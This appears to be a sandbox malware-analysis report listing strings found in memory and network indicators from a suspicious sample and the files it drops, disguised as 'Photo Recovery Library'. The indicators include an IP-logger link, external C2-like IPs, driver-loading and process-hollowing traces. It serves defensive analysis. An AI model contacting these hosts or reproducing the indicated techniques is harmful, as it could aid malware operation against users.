Source: svchost.exe, 00000003.00000003.1400334415.000001F079286000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403811178.000001F079288000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000003.00000002.1403465472.000001F07923F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402159867.000001F07925A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000003.00000002.1403359134.000001F07922B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403724935.000001F079268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400969047.000001F079267000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000003.00000002.1403465472.000001F07923F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000003.00000002.1403523618.000001F079242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000003.00000002.1403523618.000001F079242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
            Source: svchost.exe, 00000003.00000002.1403359134.000001F07922B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403724935.000001F079268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400969047.000001F079267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: powershell.exe, 0000000F.00000002.1408831814.0000027844588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: vbc.exe, 00000005.00000002.1380095836.000001798DB52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/64F2HH
            Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 0000000A.00000002.1483393077.000002AE4A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.v
            Source: svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs
            Source: svchost.exe, 00000003.00000003.1402280721.000001F079249000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403523618.000001F079242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000003.00000003.1401744037.000001F07925D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000003.00000002.1403359134.000001F07922B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1329115344.0000000002191000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1329024764.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000002.2471220408.0000000002191000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000002.2471909885.0000000002138000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000002.2471445888.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000003.1332398637.0000000002138000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000003.1332221630.00000000030F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
            Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknown HTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.6:49687 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49718 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49725 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49727 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49728 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49731 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49733 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49734 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49735 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49736 version: TLS 1.2

            System Summary

            Source: dxRwXy19pq.exeStatic PE information: section name: "YR
            Source: photorecoverylib59.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PhotoRecoveryLib.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C5716 NtUnmapViewOfSection,2_2_00007FF88B4C5716
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0042F594 NtdllDefWindowProc_A,13_2_0042F594
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00423B94 NtdllDefWindowProc_A,13_2_00423B94
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004125E8 NtdllDefWindowProc_A,13_2_004125E8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00479380 NtdllDefWindowProc_A,13_2_00479380
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,13_2_0045763C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,13_2_0042E944
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,13_2_0045568C
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\VzUtW_3288.sysJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile deleted: C:\Windows\Temp\VzUtW_3288.sysJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004037AC0_2_004037AC
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004049700_2_00404970
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004059E70_2_004059E7
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0042AA300_2_0042AA30
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00411AC00_2_00411AC0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0042B3700_2_0042B370
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00484B700_2_00484B70
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004154E00_2_004154E0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004195700_2_00419570
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00420D700_2_00420D70
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00482DE00_2_00482DE0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004016E00_2_004016E0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00401E800_2_00401E80
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004227600_2_00422760
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C52852_2_00007FF88B4C5285
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C16A52_2_00007FF88B4C16A5
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_0040840C12_2_0040840C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00470C7413_2_00470C74
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0043533C13_2_0043533C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004813C413_2_004813C4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0046784813_2_00467848
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004303D013_2_004303D0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0044453C13_2_0044453C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004885E013_2_004885E0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0043463813_2_00434638
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00444AE413_2_00444AE4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0048ED0C13_2_0048ED0C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00430F5C13_2_00430F5C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045F16C13_2_0045F16C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004451DC13_2_004451DC
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045B21C13_2_0045B21C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004455E813_2_004455E8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0048768013_2_00487680
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0046989C13_2_0046989C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00451A3013_2_00451A30
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0043DDC413_2_0043DDC4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_0040100014_2_00401000
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_004067B714_2_004067B7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609300CC14_2_609300CC
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609660FA14_2_609660FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6092114F14_2_6092114F
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6091F2C914_2_6091F2C9
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096923E14_2_6096923E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093323D14_2_6093323D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095C31414_2_6095C314
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095031214_2_60950312
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094D33B14_2_6094D33B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093B36814_2_6093B368
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096748C14_2_6096748C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093F42E14_2_6093F42E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095447014_2_60954470
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609615FA14_2_609615FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096A5EE14_2_6096A5EE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096D6A414_2_6096D6A4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609606A814_2_609606A8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093265414_2_60932654
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095566514_2_60955665
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094B7DB14_2_6094B7DB
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096480714_2_60964807
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094E9BC14_2_6094E9BC
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093792914_2_60937929
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093FAD614_2_6093FAD6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096DAE814_2_6096DAE8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094DA3A14_2_6094DA3A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60936B2714_2_60936B27
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60954CF614_2_60954CF6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60950C6B14_2_60950C6B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60966DF114_2_60966DF1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60963D3514_2_60963D35
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60909E9C14_2_60909E9C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60951E8614_2_60951E86
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60912E0B14_2_60912E0B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60954FF814_2_60954FF8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4BAFD14_2_02D4BAFD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D52A8014_2_02D52A80
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4D32F14_2_02D4D32F
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D470C014_2_02D470C0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D3E08914_2_02D3E089
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D5267D14_2_02D5267D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4B60914_2_02D4B609
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4874A14_2_02D4874A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4BF1514_2_02D4BF15
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D50DB414_2_02D50DB4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D6D0A614_2_02D6D0A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF88AB253F215_2_00007FF88AB253F2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF88ABF2E1115_2_00007FF88ABF2E11
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\PhotoRecoveryLib\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess token adjusted: Load DriverJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: String function: 02D47760 appears 32 times
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: String function: 02D52A10 appears 135 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00408C1C appears 45 times
